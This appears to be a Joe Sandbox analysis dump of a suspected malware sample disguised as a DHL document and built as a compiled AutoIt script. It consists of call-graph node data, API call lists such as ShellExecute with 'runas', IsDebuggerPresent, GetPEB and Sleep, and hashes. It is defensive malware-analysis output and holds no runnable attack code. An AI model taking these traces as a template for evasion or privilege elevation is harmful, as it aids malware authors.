90e85a 101088 92fcb1 89 API calls 4 library calls 100909->101088 100911 8d6c4c 100911->100909 100913 8d6c54 100911->100913 100915 8d77c7 59 API calls 100913->100915 100914 90e876 100917 8d6cc1 100914->100917 100916 8d6c60 100915->100916 101022 8f0b9b 60 API calls __ftell_nolock 100916->101022 100920 8d6ccf 100917->100920 100921 90e889 100917->100921 100919 8d6c6c 100922 8d77c7 59 API calls 100919->100922 100924 8d77c7 59 API calls 100920->100924 100923 8d5dcf CloseHandle 100921->100923 100925 8d6c78 100922->100925 100926 90e895 100923->100926 100927 8d6cd8 100924->100927 100928 8d48ae 60 API calls 100925->100928 100929 8d4f3d 136 API calls 100926->100929 100930 8d77c7 59 API calls 100927->100930 100931 8d6c86 100928->100931 100932 90e8b1 100929->100932 100933 8d6ce1 100930->100933 101023 8d59b0 ReadFile SetFilePointerEx 100931->101023 100935 90e8da 100932->100935 100939 9397e5 122 API calls 100932->100939 101025 8d46f9 100933->101025 101089 92fcb1 89 API calls 4 library calls 100935->101089 100938 8d6cb2 101024 8d5c4e SetFilePointerEx SetFilePointerEx 100938->101024 100944 90e8cd 100939->100944 100940 8d6cf8 100941 8d7c8e 59 API calls 100940->100941 100945 8d6d09 SetCurrentDirectoryW 100941->100945 100942 90e8f1 100965 8d6e6c Mailbox 100942->100965 100946 90e8d5 100944->100946 100947 90e8f6 100944->100947 100952 8d6d1c Mailbox 100945->100952 100949 8d4faa 84 API calls 100946->100949 100948 8d4faa 84 API calls 100947->100948 100950 90e8fb 100948->100950 100949->100935 100951 8f0ff6 Mailbox 59 API calls 100950->100951 100958 90e92f 100951->100958 100954 8f0ff6 Mailbox 59 API calls 100952->100954 100956 8d6d2f 100954->100956 100955 8d3bcd 100955->99895 100955->99904 100957 8d538e 59 API calls 100956->100957 100972 8d6d3a Mailbox __NMSG_WRITE 100957->100972 100959 8d766f 59 API calls 100958->100959 100993 90e978 Mailbox 100959->100993 100960 8d6e47 101083 8d5dcf 100960->101083 100963 90eb69 101094 937581 59 API calls Mailbox 100963->101094 100964 8d6e53 SetCurrentDirectoryW 100964->100965 101015 8d5934 100965->101015 100968 90eb8b 101095 93f835 59 API calls 2 library calls 100968->101095 100971 90eb98 100973 8f2f95 _free 58 API calls 100971->100973 100972->100960 100979 90ebfa 100972->100979 100982 8d7f41 59 API calls 100972->100982 100983 90ec02 100972->100983 101076 8d59cd 67 API calls _wcscpy 100972->101076 101077 8d70bd GetStringTypeW 100972->101077 101078 8d702c 60 API calls __wcsnicmp 100972->101078 101079 8d710a GetStringTypeW __NMSG_WRITE 100972->101079 101080 8f387d GetStringTypeW _iswctype 100972->101080 101081 8d6a3c 165 API calls 3 library calls 100972->101081 101082 8d7373 59 API calls Mailbox 100972->101082 100973->100965 100976 8d766f 59 API calls 100976->100993 100977 90ec1b 100977->100960 101097 92fb07 59 API calls 4 library calls 100979->101097 100982->100972 101098 92fcb1 89 API calls 4 library calls 100983->101098 100986 8d7f41 59 API calls 100986->100993 100990 90ebbb 101096 92fcb1 89 API calls 4 library calls 100990->101096 100992 90ebd4 100994 8f2f95 _free 58 API calls 100992->100994 100993->100963 100993->100976 100993->100986 100993->100990 101090 92fc4d 59 API calls 2 library calls 100993->101090 101091 92fb6e 61 API calls 2 library calls 100993->101091 101092 937621 59 API calls Mailbox 100993->101092 101093 8d7373 59 API calls Mailbox 100993->101093 100995 90ebe7 100994->100995 100995->100965 100997 8d770f 100996->100997 101000 8d7682 _memmove 100996->101000 100999 8f0ff6 Mailbox 59 API calls 100997->100999 100998 8f0ff6 Mailbox 59 API calls 101001 8d7689 100998->101001 100999->101000 101000->100998 101002 8f0ff6 Mailbox 59 API calls 101001->101002 101003 8d76b2 101001->101003 101002->101003 101003->100881 101005 8d74d0 101004->101005 101008 8d757e 101004->101008 101006 8f0ff6 Mailbox 59 API calls 101005->101006 101009 8d7502 101005->101009 101006->101009 101007 8f0ff6 59 API calls Mailbox 101007->101009 101008->100881 101009->101007 101009->101008 101010->100879 101011->100881 101012->100881 101013->100881 101014->100886 101016 8d5dcf CloseHandle 101015->101016 101017 8d593c Mailbox 101016->101017 101018 8d5dcf CloseHandle 101017->101018 101019 8d594b 101018->101019 101019->100955 101020->100908 101021->100911 101022->100919 101023->100938 101024->100917 101026 8d77c7 59 API calls 101025->101026 101027 8d470f 101026->101027 101028 8d77c7 59 API calls 101027->101028 101029 8d4717 101028->101029 101030 8d77c7 59 API calls 101029->101030 101031 8d471f 101030->101031 101032 8d77c7 59 API calls 101031->101032 101033 8d4727 101032->101033 101034 8d475b 101033->101034 101035 90d8fb 101033->101035 101036 8d79ab 59 API calls 101034->101036 101037 8d81a7 59 API calls 101035->101037 101038 8d4769 101036->101038 101039 90d904 101037->101039 101040 8d7e8c 59 API calls 101038->101040 101041 8d7eec 59 API calls 101039->101041 101042 8d4773 101040->101042 101044 8d479e 101041->101044 101043 8d79ab 59 API calls 101042->101043 101042->101044 101046 8d4794 101043->101046 101047 8d47bd 101044->101047 101057 90d924 101044->101057 101062 8d47de 101044->101062 101045 8d79ab 59 API calls 101048 8d47ef 101045->101048 101049 8d7e8c 59 API calls 101046->101049 101051 8d7b52 59 API calls 101047->101051 101052 8d4801 101048->101052 101055 8d81a7 59 API calls 101048->101055 101049->101044 101050 90d9f4 101053 8d7d2c 59 API calls 101050->101053 101054 8d47c7 101051->101054 101056 8d4811 101052->101056 101059 8d81a7 59 API calls 101052->101059 101071 90d9b1 101053->101071 101058 8d79ab 59 API calls 101054->101058 101054->101062 101055->101052 101061 8d4818 101056->101061 101063 8d81a7 59 API calls 101056->101063 101057->101050 101060 90d9dd 101057->101060 101069 90d95b 101057->101069 101058->101062 101059->101056 101060->101050 101065 90d9c8 101060->101065 101064 8d81a7 59 API calls 101061->101064 101073 8d481f Mailbox 101061->101073 101062->101045 101063->101061 101064->101073 101067 8d7d2c 59 API calls 101065->101067 101066 90d9b9 101068 8d7d2c 59 API calls 101066->101068 101067->101071 101068->101071 101069->101066 101074 90d9a4 101069->101074 101070 8d7b52 59 API calls 101070->101071 101071->101062 101071->101070 101099 8d7a84 59 API calls 2 library calls 101071->101099 101073->100940 101075 8d7d2c 59 API calls 101074->101075 101075->101071 101076->100972 101077->100972 101078->100972 101079->100972 101080->100972 101081->100972 101082->100972 101084 8d5dd9 101083->101084 101085 8d5de8 101083->101085 101084->100964 101085->101084 101086 8d5ded CloseHandle 101085->101086 101086->101084 101087->100909 101088->100914 101089->100942 101090->100993 101091->100993 101092->100993 101093->100993 101094->100968 101095->100971 101096->100992 101097->100983 101098->100977 101099->101071 101101 8d6ef5 101100->101101 101105 8d7009 101100->101105 101102 8f0ff6 Mailbox 59 API calls 101101->101102 101101->101105 101104 8d6f1c 101102->101104 101103 8f0ff6 Mailbox 59 API calls 101109 8d6f91 101103->101109 101104->101103 101105->100042 101108 8d74bd 59 API calls 101108->101109 101109->101105 101109->101108 101110 8d766f 59 API calls 101109->101110 101113 8d63a0 101109->101113 101138 926ac9 59 API calls Mailbox 101109->101138 101110->101109 101111->100044 101112->100046 101139 8d7b76 101113->101139 101115 8d65ca 101116 8d766f 59 API calls 101115->101116 101124 8d65e4 Mailbox 101116->101124 101119 90e41f 101148 92fdba 91 API calls 4 library calls 101119->101148 101120 8d766f 59 API calls 101134 8d63c5 101120->101134 101122 8d68f9 _memmove 101149 92fdba 91 API calls 4 library calls 101122->101149 101124->101109 101126 8d7eec 59 API calls 101126->101134 101127 90e42d 101128 8d766f 59 API calls 101127->101128 101129 90e443 101128->101129 101129->101124 101130 90e3bb 101131 8d8189 59 API calls 101130->101131 101133 90e3c6 101131->101133 101137 8f0ff6 Mailbox 59 API calls 101133->101137 101134->101115 101134->101119 101134->101120 101134->101122 101134->101126 101134->101130 101135 8d7faf 59 API calls 101134->101135 101144 8d60cc 60 API calls 101134->101144 101145 8d5ea1 59 API calls Mailbox 101134->101145 101146 8d5fd2 60 API calls 101134->101146 101147 8d7a84 59 API calls 2 library calls 101134->101147 101136 8d659b CharUpperBuffW 101135->101136 101136->101134 101137->101122 101138->101109 101140 8f0ff6 Mailbox 59 API calls 101139->101140 101141 8d7b9b 101140->101141 101142 8d8189 59 API calls 101141->101142 101143 8d7baa 101142->101143 101143->101134 101144->101134 101145->101134 101146->101134 101147->101134 101148->101127 101149->101124 101150->100060 101151->100061 101153 90d638 101152->101153 101154 8d4227 101152->101154 101153->101154 101155 90d641 DestroyIcon 101153->101155 101154->100072 101178 933226 62 API calls _W_store_winword 101154->101178 101155->101154 101157 8d4129 101156->101157 101158 8d4200 Mailbox 101156->101158 101159 8d7b76 59 API calls 101157->101159 101158->100073 101160 8d4137 101159->101160 101161 8d4144 101160->101161 101162 90d5dd LoadStringW 101160->101162 101163 8d7d2c 59 API calls 101161->101163 101164 90d5f7 101162->101164 101165 8d4159 101163->101165 101166 8d7c8e 59 API calls 101164->101166 101165->101164 101167 8d416a 101165->101167 101172 90d601 101166->101172 101168 8d4205 101167->101168 101169 8d4174 101167->101169 101171 8d81a7 59 API calls 101168->101171 101170 8d7c8e 59 API calls 101169->101170 101174 8d417e _memset _wcscpy 101170->101174 101171->101174 101173 8d7e0b 59 API calls 101172->101173 101172->101174 101175 90d623 101173->101175 101176 8d41e6 Shell_NotifyIconW 101174->101176 101177 8d7e0b 59 API calls 101175->101177 101176->101158 101177->101174 101178->100072 101180 8de835 101179->101180 101181 913ed3 101180->101181 101184 8de89f 101180->101184 101193 8de8f9 101180->101193 101252 8da000 101181->101252 101183 913ee8 101208 8dead0 Mailbox 101183->101208 101275 93a0b5 89 API calls 4 library calls 101183->101275 101187 8d77c7 59 API calls 101184->101187 101184->101193 101185 8d77c7 59 API calls 101185->101193 101188 913f2e 101187->101188 101190 8f2f80 __cinit 67 API calls 101188->101190 101189 8f2f80 __cinit 67 API calls 101189->101193 101190->101193 101191 913f50 101191->100144 101192 8d8620 69 API calls 101192->101208 101193->101185 101193->101189 101193->101191 101195 8deaba 101193->101195 101193->101208 101195->101208 101276 93a0b5 89 API calls 4 library calls 101195->101276 101196 8d8ea0 59 API calls 101196->101208 101198 8da000 331 API calls 101198->101208 101200 8df2f5 101280 93a0b5 89 API calls 4 library calls 101200->101280 101202 91424f 101202->100144 101205 93a0b5 89 API calls 101205->101208 101208->101192 101208->101196 101208->101198 101208->101200 101208->101205 101209 8debd8 101208->101209 101251 8d80d7 59 API calls 2 library calls 101208->101251 101277 927405 59 API calls 101208->101277 101278 94c8d7 331 API calls 101208->101278 101279 94b851 331 API calls Mailbox 101208->101279 101281 8d9df0 59 API calls Mailbox 101208->101281 101282 9496db 331 API calls Mailbox 101208->101282 101209->100144 101211 8df61a 101210->101211 101212 8df7b0 101210->101212 101214 914848 101211->101214 101215 8df626 101211->101215 101213 8d7f41 59 API calls 101212->101213 101221 8df6ec Mailbox 101213->101221 101383 94bf80 331 API calls Mailbox 101214->101383 101381 8df3f0 331 API calls 2 library calls 101215->101381 101218 914856 101222 8df790 101218->101222 101384 93a0b5 89 API calls 4 library calls 101218->101384 101220 8df65d 101220->101218 101220->101221 101220->101222 101227 8d4faa 84 API calls 101221->101227 101289 933e73 101221->101289 101292 94474d 101221->101292 101301 93cde5 101221->101301 101222->100144 101224 8df743 101224->101222 101382 8d9df0 59 API calls Mailbox 101224->101382 101227->101224 101229->100144 101230->100144 101231->100144 101232->100080 101233->100085 101234->100144 101235->100087 101236->100087 101237->100087 101238->100144 101239->100144 101240->100144 101241->100144 101242->100144 101243->100144 101244->100133 101245->100133 101246->100133 101247->100133 101248->100133 101249->100133 101250->100133 101251->101208 101253 8da01f 101252->101253 101269 8da04d Mailbox 101252->101269 101254 8f0ff6 Mailbox 59 API calls 101253->101254 101254->101269 101255 8f2f80 67 API calls __cinit 101255->101269 101256 8db5d5 101257 8d81a7 59 API calls 101256->101257 101270 8da1b7 101257->101270 101258 8f0ff6 59 API calls Mailbox 101258->101269 101262 91047f 101285 93a0b5 89 API calls 4 library calls 101262->101285 101263 8d77c7 59 API calls 101263->101269 101265 8d81a7 59 API calls 101265->101269 101267 927405 59 API calls 101267->101269 101268 91048e 101268->101183 101269->101255 101269->101256 101269->101258 101269->101262 101269->101263 101269->101265 101269->101267 101269->101270 101271 910e00 101269->101271 101273 8da6ba 101269->101273 101274 8db5da 101269->101274 101283 8dca20 331 API calls 2 library calls 101269->101283 101284 8dba60 60 API calls Mailbox 101269->101284 101270->101183 101287 93a0b5 89 API calls 4 library calls 101271->101287 101286 93a0b5 89 API calls 4 library calls 101273->101286 101288 93a0b5 89 API calls 4 library calls 101274->101288 101275->101208 101276->101208 101277->101208 101278->101208 101279->101208 101280->101202 101281->101208 101282->101208 101283->101269 101284->101269 101285->101268 101286->101270 101287->101274 101288->101270 101385 934696 GetFileAttributesW 101289->101385 101293 8d9997 84 API calls 101292->101293 101294 944787 101293->101294 101295 8d63a0 94 API calls 101294->101295 101296 944797 101295->101296 101297 9447bc 101296->101297 101298 8da000 331 API calls 101296->101298 101300 9447c0 101297->101300 101389 8d9bf8 59 API calls Mailbox 101297->101389 101298->101297 101300->101224 101302 8d77c7 59 API calls 101301->101302 101303 93ce1a 101302->101303 101304 8d77c7 59 API calls 101303->101304 101305 93ce23 101304->101305 101306 93ce37 101305->101306 101499 8d9c9c 59 API calls 101305->101499 101308 8d9997 84 API calls 101306->101308 101309 93ce54 101308->101309 101310 93ce76 101309->101310 101311 93cf55 101309->101311 101380 93cf85 Mailbox 101309->101380 101312 8d9997 84 API calls 101310->101312 101313 8d4f3d 136 API calls 101311->101313 101314 93ce82 101312->101314 101315 93cf69 101313->101315 101316 8d81a7 59 API calls 101314->101316 101317 93cf81 101315->101317 101319 8d4f3d 136 API calls 101315->101319 101318 93ce8e 101316->101318 101320 8d77c7 59 API calls 101317->101320 101317->101380 101324 93cea2 101318->101324 101325 93ced4 101318->101325 101319->101317 101321 93cfb6 101320->101321 101322 8d77c7 59 API calls 101321->101322 101323 93cfbf 101322->101323 101327 8d77c7 59 API calls 101323->101327 101328 8d81a7 59 API calls 101324->101328 101326 8d9997 84 API calls 101325->101326 101329 93cee1 101326->101329 101330 93cfc8 101327->101330 101331 93ceb2 101328->101331 101332 8d81a7 59 API calls 101329->101332 101333 8d77c7 59 API calls 101330->101333 101334 8d7e0b 59 API calls 101331->101334 101335 93ceed 101332->101335 101336 93cfd1 101333->101336 101337 93cebc 101334->101337 101500 934cd3 GetFileAttributesW 101335->101500 101339 8d9997 84 API calls 101336->101339 101340 8d9997 84 API calls 101337->101340 101342 93cfde 101339->101342 101343 93cec8 101340->101343 101341 93cef6 101344 93cf09 101341->101344 101347 8d7b52 59 API calls 101341->101347 101345 8d46f9 59 API calls 101342->101345 101346 8d7c8e 59 API calls 101343->101346 101349 8d9997 84 API calls 101344->101349 101354 93cf0f 101344->101354 101348 93cff9 101345->101348 101346->101325 101347->101344 101350 8d7b52 59 API calls 101348->101350 101351 93cf36 101349->101351 101353 93d008 101350->101353 101501 933a2b 75 API calls Mailbox 101351->101501 101355 93d03c 101353->101355 101357 8d7b52 59 API calls 101353->101357 101354->101380 101356 8d81a7 59 API calls 101355->101356 101358 93d04a 101356->101358 101359 93d019 101357->101359 101360 8d7c8e 59 API calls 101358->101360 101359->101355 101361 8d7d2c 59 API calls 101359->101361 101362 93d058 101360->101362 101363 93d02e 101361->101363 101364 8d7c8e 59 API calls 101362->101364 101365 8d7d2c 59 API calls 101363->101365 101366 93d066 101364->101366 101365->101355 101367 8d7c8e 59 API calls 101366->101367 101368 93d074 101367->101368 101369 8d9997 84 API calls 101368->101369 101370 93d080 101369->101370 101390 9342ad 101370->101390 101372 93d091 101373 933e73 3 API calls 101372->101373 101374 93d09b 101373->101374 101375 8d9997 84 API calls 101374->101375 101379 93d0cc 101374->101379 101376 93d0b9 101375->101376 101444 9393df 101376->101444 101378 8d4faa 84 API calls 101378->101380 101379->101378 101380->101224 101381->101220 101382->101224 101383->101218 101384->101222 101386 933e7a 101385->101386 101387 9346b1 FindFirstFileW 101385->101387 101386->101224 101387->101386 101388 9346c6 FindClose 101387->101388 101388->101386 101389->101300 101391 9342c9 101390->101391 101392 9342ce 101391->101392 101393 9342dc 101391->101393 101394 8d81a7 59 API calls 101392->101394 101395 8d77c7 59 API calls 101393->101395 101443 9342d7 Mailbox 101394->101443 101396 9342e4 101395->101396 101397 8d77c7 59 API calls 101396->101397 101398 9342ec 101397->101398 101399 8d77c7 59 API calls 101398->101399 101400 9342f7 101399->101400 101401 8d77c7 59 API calls 101400->101401 101402 9342ff 101401->101402 101403 8d77c7 59 API calls 101402->101403 101404 934307 101403->101404 101405 8d77c7 59 API calls 101404->101405 101406 93430f 101405->101406 101407 8d77c7 59 API calls 101406->101407 101408 934317 101407->101408 101409 8d77c7 59 API calls 101408->101409 101410 93431f 101409->101410 101411 8d46f9 59 API calls 101410->101411 101412 934336 101411->101412 101413 8d46f9 59 API calls 101412->101413 101414 93434f 101413->101414 101415 8d7b52 59 API calls 101414->101415 101416 93435b 101415->101416 101417 93436e 101416->101417 101418 8d7e8c 59 API calls 101416->101418 101419 8d7b52 59 API calls 101417->101419 101418->101417 101420 934377 101419->101420 101421 934387 101420->101421 101422 8d7e8c 59 API calls 101420->101422 101423 8d81a7 59 API calls 101421->101423 101422->101421 101424 934393 101423->101424 101425 8d7c8e 59 API calls 101424->101425 101426 93439f 101425->101426 101502 93445f 59 API calls 101426->101502 101428 9343ae 101503 93445f 59 API calls 101428->101503 101430 9343c1 101431 8d7b52 59 API calls 101430->101431 101432 9343cb 101431->101432 101433 9343e2 101432->101433 101434 9343d0 101432->101434 101436 8d7b52 59 API calls 101433->101436 101435 8d7e0b 59 API calls 101434->101435 101437 9343dd 101435->101437 101438 9343eb 101436->101438 101441 8d7c8e 59 API calls 101437->101441 101439 934409 101438->101439 101440 8d7e0b 59 API calls 101438->101440 101442 8d7c8e 59 API calls 101439->101442 101440->101437 101441->101439 101442->101443 101443->101372 101445 9393ec __ftell_nolock 101444->101445 101446 8f0ff6 Mailbox 59 API calls 101445->101446 101447 939449 101446->101447 101448 8d538e 59 API calls 101447->101448 101449 939453 101448->101449 101450 9391e9 GetSystemTimeAsFileTime 101449->101450 101451 93945e 101450->101451 101452 8d5045 85 API calls 101451->101452 101453 939471 _wcscmp 101452->101453 101454 939542 101453->101454 101455 939495 101453->101455 101456 9399be 96 API calls 101454->101456 101457 9399be 96 API calls 101455->101457 101469 93950e _wcscat 101456->101469 101458 93949a 101457->101458 101461 93954b 101458->101461 101521 8f432e 58 API calls __wsplitpath_helper 101458->101521 101460 8d506b 74 API calls 101462 939567 101460->101462 101461->101379 101463 8d506b 74 API calls 101462->101463 101465 939577 101463->101465 101464 9394c3 _wcscat _wcscpy 101522 8f432e 58 API calls __wsplitpath_helper 101464->101522 101466 8d506b 74 API calls 101465->101466 101468 939592 101466->101468 101470 8d506b 74 API calls 101468->101470 101469->101460 101469->101461 101471 9395a2 101470->101471 101472 8d506b 74 API calls 101471->101472 101473 9395bd 101472->101473 101474 8d506b 74 API calls 101473->101474 101475 9395cd 101474->101475 101476 8d506b 74 API calls 101475->101476 101477 9395dd 101476->101477 101478 8d506b 74 API calls 101477->101478 101479 9395ed 101478->101479 101504 939b6d GetTempPathW GetTempFileNameW 101479->101504 101481 9395f9 101482 8f548b 115 API calls 101481->101482 101493 93960a 101482->101493 101483 9396c4 101484 8f55d6 __fcloseall 83 API calls 101483->101484 101486 8d506b 74 API calls 101486->101493 101493->101461 101493->101483 101493->101486 101505 8f4a93 101493->101505 101499->101306 101500->101341 101501->101354 101502->101428 101503->101430 101504->101481 101506 8f4a9f type_info::_Type_info_dtor 101505->101506 101507 8f4abd 101506->101507 101521->101464 101522->101469 101541 e4f388 101555 e4cfd8 101541->101555 101543 e4f464 101558 e4f278 101543->101558 101557 e4d663 101555->101557 101561 e50488 GetPEB 101555->101561 101557->101543 101559 e4f281 Sleep 101558->101559 101560 e4f28f 101559->101560 101561->101557 101562 8d3633 101563 8d366a 101562->101563 101564 8d3688 101563->101564 101565 8d36e7 101563->101565 101602 8d36e5 101563->101602 101566 8d375d PostQuitMessage 101564->101566 101567 8d3695 101564->101567 101569 8d36ed 101565->101569 101570 90d31c 101565->101570 101603 8d36d8 101566->101603 101573 8d36a0 101567->101573 101574 90d38f 101567->101574 101568 8d36ca DefWindowProcW 101568->101603 101571 8d3715 SetTimer RegisterWindowMessageW 101569->101571 101572 8d36f2 101569->101572 101612 8e11d0 10 API calls Mailbox 101570->101612 101578 8d373e CreatePopupMenu 101571->101578 101571->101603 101576 8d36f9 KillTimer 101572->101576 101577 90d2bf 101572->101577 101579 8d36a8 101573->101579 101580 8d3767 101573->101580 101616 932a16 71 API calls _memset 101574->101616 101607 8d44cb Shell_NotifyIconW _memset 101576->101607 101583 90d2c4 101577->101583 101584 90d2f8 MoveWindow 101577->101584 101578->101603 101586 8d36b3 101579->101586 101592 90d374 101579->101592 101610 8d4531 64 API calls _memset 101580->101610 101582 90d343 101613 8e11f3 331 API calls Mailbox 101582->101613 101589 90d2e7 SetFocus 101583->101589 101590 90d2c8 101583->101590 101584->101603 101593 8d36be 101586->101593 101594 8d374b 101586->101594 101589->101603 101590->101593 101597 90d2d1 101590->101597 101591 8d370c 101608 8d3114 DeleteObject DestroyWindow Mailbox 101591->101608 101592->101568 101615 92817e 59 API calls Mailbox 101592->101615 101593->101568 101614 8d44cb Shell_NotifyIconW _memset 101593->101614 101609 8d45df 81 API calls _memset 101594->101609 101595 90d3a1 101595->101568 101595->101603 101596 8d375b 101596->101603 101611 8e11d0 10 API calls Mailbox 101597->101611 101602->101568 101605 90d368 101606 8d43db 68 API calls 101605->101606 101606->101602 101607->101591 101608->101603 101609->101596 101610->101596 101611->101603 101612->101582 101613->101593 101614->101605 101615->101602 101616->101595

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008D3B7A
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 008D3B8C
                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,009962F8,009962E0,?,?), ref: 008D3BFD
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                    • Part of subcall function 008E0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008D3C26,009962F8,?,?,?), ref: 008E0ACE
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008D3C81
                                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009893F0,00000010), ref: 0090D4BC
                                                                                  • SetCurrentDirectoryW.KERNEL32(?,009962F8,?,?,?), ref: 0090D4F4
                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00985D40,009962F8,?,?,?), ref: 0090D57A
                                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 0090D581
                                                                                    • Part of subcall function 008D3A58: GetSysColorBrush.USER32(0000000F), ref: 008D3A62
                                                                                    • Part of subcall function 008D3A58: LoadCursorW.USER32(00000000,00007F00), ref: 008D3A71
                                                                                    • Part of subcall function 008D3A58: LoadIconW.USER32(00000063), ref: 008D3A88
                                                                                    • Part of subcall function 008D3A58: LoadIconW.USER32(000000A4), ref: 008D3A9A
                                                                                    • Part of subcall function 008D3A58: LoadIconW.USER32(000000A2), ref: 008D3AAC
                                                                                    • Part of subcall function 008D3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008D3AD2
                                                                                    • Part of subcall function 008D3A58: RegisterClassExW.USER32(?), ref: 008D3B28
                                                                                    • Part of subcall function 008D39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008D3A15
                                                                                    • Part of subcall function 008D39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008D3A36
                                                                                    • Part of subcall function 008D39E7: ShowWindow.USER32(00000000,?,?), ref: 008D3A4A
                                                                                    • Part of subcall function 008D39E7: ShowWindow.USER32(00000000,?,?), ref: 008D3A53
                                                                                    • Part of subcall function 008D43DB: _memset.LIBCMT ref: 008D4401
                                                                                    • Part of subcall function 008D43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008D44A6
                                                                                  Strings
                                                                                  • This is a third-party compiled AutoIt script., xrefs: 0090D4B4
                                                                                  • runas, xrefs: 0090D575
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                  • API String ID: 529118366-3287110873
                                                                                  • Opcode ID: 25601ac719f343298a44ada9e3cccefd5cf2e3154f65e30dc073efe5a780e7ef
                                                                                  • Instruction ID: 65c4441ae71927ce4f8751f39dc76e87115b3ee847cb3d26bfe90c2a2ead4fd2
                                                                                  • Opcode Fuzzy Hash: 25601ac719f343298a44ada9e3cccefd5cf2e3154f65e30dc073efe5a780e7ef
                                                                                  • Instruction Fuzzy Hash: 1A510130A28248AECF11ABFCDC15EFD7B78FB44354B004267F461E23A1DA744A05EB22

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 996 8d4afe-8d4b5e call 8d77c7 GetVersionExW call 8d7d2c 1001 8d4c69-8d4c6b 996->1001 1002 8d4b64 996->1002 1004 90db90-90db9c 1001->1004 1003 8d4b67-8d4b6c 1002->1003 1006 8d4c70-8d4c71 1003->1006 1007 8d4b72 1003->1007 1005 90db9d-90dba1 1004->1005 1008 90dba3 1005->1008 1009 90dba4-90dbb0 1005->1009 1010 8d4b73-8d4baa call 8d7e8c call 8d7886 1006->1010 1007->1010 1008->1009 1009->1005 1011 90dbb2-90dbb7 1009->1011 1019 90dc8d-90dc90 1010->1019 1020 8d4bb0-8d4bb1 1010->1020 1011->1003 1013 90dbbd-90dbc4 1011->1013 1013->1004 1015 90dbc6 1013->1015 1018 90dbcb-90dbce 1015->1018 1021 90dbd4-90dbf2 1018->1021 1022 8d4bf1-8d4c08 GetCurrentProcess IsWow64Process 1018->1022 1023 90dc92 1019->1023 1024 90dca9-90dcad 1019->1024 1020->1018 1025 8d4bb7-8d4bc2 1020->1025 1021->1022 1026 90dbf8-90dbfe 1021->1026 1032 8d4c0d-8d4c1e 1022->1032 1033 8d4c0a 1022->1033 1027 90dc95 1023->1027 1030 90dc98-90dca1 1024->1030 1031 90dcaf-90dcb8 1024->1031 1028 90dc13-90dc19 1025->1028 1029 8d4bc8-8d4bca 1025->1029 1036 90dc00-90dc03 1026->1036 1037 90dc08-90dc0e 1026->1037 1027->1030 1040 90dc23-90dc29 1028->1040 1041 90dc1b-90dc1e 1028->1041 1038 8d4bd0-8d4bd3 1029->1038 1039 90dc2e-90dc3a 1029->1039 1030->1024 1031->1027 1042 90dcba-90dcbd 1031->1042 1034 8d4c89-8d4c93 GetSystemInfo 1032->1034 1035 8d4c20-8d4c30 call 8d4c95 1032->1035 1033->1032 1048 8d4c56-8d4c66 1034->1048 1053 8d4c7d-8d4c87 GetSystemInfo 1035->1053 1054 8d4c32-8d4c3f call 8d4c95 1035->1054 1036->1022 1037->1022 1046 8d4bd9-8d4be8 1038->1046 1047 90dc5a-90dc5d 1038->1047 1043 90dc44-90dc4a 1039->1043 1044 90dc3c-90dc3f 1039->1044 1040->1022 1041->1022 1042->1030 1043->1022 1044->1022 1051 8d4bee 1046->1051 1052 90dc4f-90dc55 1046->1052 1047->1022 1050 90dc63-90dc78 1047->1050 1055 90dc82-90dc88 1050->1055 1056 90dc7a-90dc7d 1050->1056 1051->1022 1052->1022 1058 8d4c47-8d4c4b 1053->1058 1061 8d4c76-8d4c7b 1054->1061 1062 8d4c41-8d4c45 GetNativeSystemInfo 1054->1062 1055->1022 1056->1022 1058->1048 1060 8d4c4d-8d4c50 FreeLibrary 1058->1060 1060->1048 1061->1062 1062->1058
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 008D4B2B
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                  • GetCurrentProcess.KERNEL32(?,0095FAEC,00000000,00000000,?), ref: 008D4BF8
                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 008D4BFF
                                                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 008D4C45
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 008D4C50
                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 008D4C81
                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 008D4C8D
                                                                                  Memory Dump Source
